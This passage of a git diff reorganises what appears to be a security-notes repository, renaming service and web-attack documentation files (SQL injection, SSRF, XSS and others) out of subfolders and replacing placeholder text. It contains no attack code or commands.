rename to docs/Services/FTP.md
diff --git a/docs/Services/IMAP/IMAP.md b/docs/Services/IMAP.md
similarity index 100%
rename from docs/Services/IMAP/IMAP.md
rename to docs/Services/IMAP.md
diff --git a/docs/Services/MSSQL/MSSQL.md b/docs/Services/MSSQL.md
similarity index 100%
rename from docs/Services/MSSQL/MSSQL.md
rename to docs/Services/MSSQL.md
diff --git a/docs/Services/POP3/POP3.md b/docs/Services/POP3.md
similarity index 100%
rename from docs/Services/POP3/POP3.md
rename to docs/Services/POP3.md
diff --git a/docs/Services/SAMBA - SMB/SAMBA - SMB.md b/docs/Services/SAMBA - SMB.md
similarity index 100%
rename from docs/Services/SAMBA - SMB/SAMBA - SMB.md
rename to docs/Services/SAMBA - SMB.md
diff --git a/docs/Services/SMTP/SMTP.md b/docs/Services/SMTP.md
similarity index 100%
rename from docs/Services/SMTP/SMTP.md
rename to docs/Services/SMTP.md
diff --git a/docs/Services/Services.md b/docs/Services/Services.md
index 8318c86b3..504e96786 100644
--- a/docs/Services/Services.md
+++ b/docs/Services/Services.md
@@ -1 +1 @@
-Test
\ No newline at end of file
+List of services and general commands
\ No newline at end of file
diff --git a/docs/Web/IDOR/IDOR.md b/docs/Web/IDOR.md
similarity index 100%
rename from docs/Web/IDOR/IDOR.md
rename to docs/Web/IDOR.md
diff --git a/docs/Web/RFI-LFI File Inclusion/RFI-LFI File Inclusion.md b/docs/Web/RFI-LFI File Inclusion.md
similarity index 100%
rename from docs/Web/RFI-LFI File Inclusion/RFI-LFI File Inclusion.md
rename to docs/Web/RFI-LFI File Inclusion.md
diff --git a/docs/Web/Command Injection/SQL Injection.md b/docs/Web/SQL Injection.md
similarity index 100%
rename from docs/Web/Command Injection/SQL Injection.md
rename to docs/Web/SQL Injection.md
diff --git a/docs/Web/SQL Injection/SQL Injection.md b/docs/Web/SQL Injection/SQL Injection.md
deleted file mode 100644
index 8318c86b3..000000000
--- a/docs/Web/SQL Injection/SQL Injection.md
+++ /dev/null
@@ -1 +0,0 @@
-Test
\ No newline at end of file
diff --git a/docs/Web/SSRF/SSRF.md b/docs/Web/SSRF.md
similarity index 100%
rename from docs/Web/SSRF/SSRF.md
rename to docs/Web/SSRF.md
diff --git a/docs/Web/XSS (Cross-Site Scripting)/XSS (Cross-Site Scripting).md b/docs/Web/XSS (Cross-Site Scripting).md
similarity index 100%
rename from docs/Web/XSS (Cross-Site Scripting)/XSS (Cross-Site Scripting).md
rename to docs/Web/XSS (Cross-Site Scripting).md